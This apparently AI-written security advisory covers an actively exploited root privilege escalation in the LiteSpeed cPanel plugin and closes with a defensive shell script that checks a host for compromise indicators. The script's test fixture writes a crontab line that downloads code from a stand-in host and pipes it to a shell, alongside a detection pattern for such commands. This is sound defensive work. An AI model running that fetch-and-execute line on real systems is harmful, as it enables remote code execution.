CISA: Patch LiteSpeed cPanel Plugin Now — Root Privilege Escalation Under Active Exploit
Patch deadline: June 18, 2026. That is 48 hours from now.
CISA has added a security flaw in the LiteSpeed cPanel Plugin to its Known Exploited Vulnerabilities (KEV) catalog, confirming the vulnerability is being actively exploited in the wild. Federal Civilian Executive Branch agencies are required to remediate by June 18 under Binding Operational Directive 22-01 — but the blast radius extends far beyond government infrastructure.
What Happened
The flaw lives in LiteSpeed's plugin for cPanel. That pairing is found across shared hosting environments, VPS stacks, and dedicated servers worldwide: cPanel is estimated to power tens of millions of websites, and LiteSpeed Web Server is frequently installed on cPanel hosts as a drop-in replacement for Apache, managed through the plugin. The vulnerability lets an attacker who already holds a lower-privileged position on the box escalate to root.
CISA does not add entries to the KEV catalog speculatively: a flaw is listed only when there is reliable evidence that it has been exploited in the wild, not merely a published proof of concept. By the time something lands there, working exploits are being used against real targets. This is not a "patch when convenient" situation.
Why It Matters
Root privilege escalation is the worst-case outcome on a Linux server. An attacker with root can:
- Read or exfiltrate every file, database, and credential on the machine
- Extract TLS private keys stored on disk and impersonate every site the server hosts
- Install persistent backdoors or kernel rootkits that survive reboots
- Pivot laterally into internal networks or cloud control planes
Shared hosting amplifies the damage: one compromised cPanel server can expose hundreds or thousands of tenant sites simultaneously. Hosting providers running LiteSpeed at scale are high-value targets for exactly this reason — compromise one box, harvest many accounts.
What to Do
1. Inventory now. Identify every internet-accessible server running cPanel with the LiteSpeed plugin installed. If you use managed hosting, contact your provider today and demand their patch status in writing.
2. Apply the vendor update. LiteSpeed has released a patched version. Update via the cPanel Plugin Manager or the LiteSpeed WebAdmin console, then record the installed version and confirm the update actually applied on every host, not just the first one you touched. Full version details are in The Hacker News advisory.
3. Hunt for compromise indicators. If patching is delayed even by hours, audit immediately: review /root/.ssh/authorized_keys for unfamiliar entries, list every user's crontab (crontab -l -u USER for each account, or read the per-user files under /var/spool/cron directly on RHEL-family hosts), scan for recently modified files under /etc and /usr/local/cpanel (find with -mtime), and look for accounts other than root with UID 0 in /etc/passwd. Any hit means the host must be treated as compromised, not merely patched: the update closes the door, it does not evict an attacker who already holds root.
4. Check provider advisories. Major cPanel-based managed hosts should have their own bulletins active. If yours has not communicated yet, escalate through support — silence is not the same as safety.
5. Federal and contractor teams: this is mandatory. BOD 22-01 makes the June 18 deadline a compliance obligation, not a recommendation.
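The four checks in step 3, wrapped into one POSIX shell sweep that can be run as-is on a suspect host. This is an added example written for this page, not LiteSpeed's or cPanel's own tooling. The live-system defaults (/etc/passwd, /root/.ssh/authorized_keys, /var/spool/cron, /etc, /usr/local/cpanel, and /usr/local/lsws as LiteSpeed's install root) are assumptions that match a stock RHEL-family cPanel install; every function takes a path argument so the same code works on files copied off a box. The fixture at the bottom is constructed data, included only so the script runs offline.

```shell
#!/bin/sh
# Added example (not from the advisory): compromise-indicator sweep for a
# cPanel/LiteSpeed host. Each function prints findings to stdout; an empty
# result is "nothing matched", not "host is clean".
# Assumed default paths: RHEL-family cPanel layout, LiteSpeed under /usr/local/lsws.

# Accounts with UID 0 other than root (a second UID-0 user is a classic backdoor).
find_uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "${1:-/etc/passwd}"
}

# One line per key in an authorized_keys file: key type plus the first word of
# the comment. Key material is deliberately not echoed. Lines that begin with
# options such as command="..." or from="..." are handled by scanning fields.
list_authorized_keys() {
    awk '/^[[:space:]]*#/ || /^[[:space:]]*$/ { next }
         {
             type = ""; comment = ""
             for (i = 1; i <= NF; i++)
                 if ($i ~ /^(ssh-|ecdsa-|sk-)/) { type = $i; comment = $(i + 2); break }
             if (type != "") print type, (comment == "" ? "(no comment)" : comment)
         }' "${1:-/root/.ssh/authorized_keys}"
}

# Per-user crontab files (cPanel on RHEL-family keeps them in /var/spool/cron)
# containing a "fetch and pipe to a shell" or base64-decode pattern.
# A heuristic lead, not proof; a missing or empty directory prints nothing.
find_fetch_exec_crons() {
    dir="${1:-/var/spool/cron}"
    grep -sHE '(curl|wget)[^|]*[|][[:space:]]*(ba)?sh|base64[[:space:]]+(-d|--decode)' "$dir"/* || true
}

# Regular files modified within the last N days under the given roots.
# Usage: recently_modified [DAYS] [ROOT...]; defaults to 2 days over the
# config, cPanel and LiteSpeed trees.
recently_modified() {
    days="${1:-2}"
    if [ $# -gt 0 ]; then shift; fi
    [ $# -gt 0 ] || set -- /etc /usr/local/cpanel /usr/local/lsws
    find "$@" -type f -mtime "-$days" 2>/dev/null || true
}

# --- Demonstration on a constructed fixture (not real host data) ---
fixture=$(mktemp -d)
mkdir -p "$fixture/cron" "$fixture/etc"
printf 'root:x:0:0:root:/root:/bin/bash\nalice:x:1000:1000::/home/alice:/bin/bash\nsvcacct:x:0:0::/tmp:/bin/sh\n' > "$fixture/passwd"
printf '# managed by ansible\nssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOexample ops@bastion\ncommand="/bin/true",no-pty ssh-rsa AAAAB3NzaC1yc2Eexample\n' > "$fixture/authorized_keys"
printf '0 3 * * * /usr/local/bin/backup.sh\n' > "$fixture/cron/alice"
printf '*/5 * * * * curl -s http://example.invalid/x | sh\n' > "$fixture/cron/bob"
printf 'old\n' > "$fixture/etc/old.conf"; touch -t 202001010000 "$fixture/etc/old.conf"
printf 'new\n' > "$fixture/etc/new.conf"

echo "== UID 0 accounts other than root =="; find_uid0_accounts "$fixture/passwd"
echo "== root authorized_keys =="; list_authorized_keys "$fixture/authorized_keys"
echo "== crontabs that fetch and execute =="; find_fetch_exec_crons "$fixture/cron"
echo "== files modified in the last 2 days =="; recently_modified 2 "$fixture/etc"
rm -rf "$fixture"
```

On a live box, run it as root and call each function with no arguments to use the default paths; the fixture section reports svcacct as an extra UID-0 account, two keys (one of them with no comment, hidden behind a command= option), bob's curl-pipe-to-sh crontab, and only new.conf as recently modified. Treat any hit as a reason to preserve the host for forensics before you patch, and treat a clean run as nothing more than "these four places looked normal".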
The window to act before this becomes a breach notification exercise is closing fast.
Synthesized by Claude · sanity-checked before publish.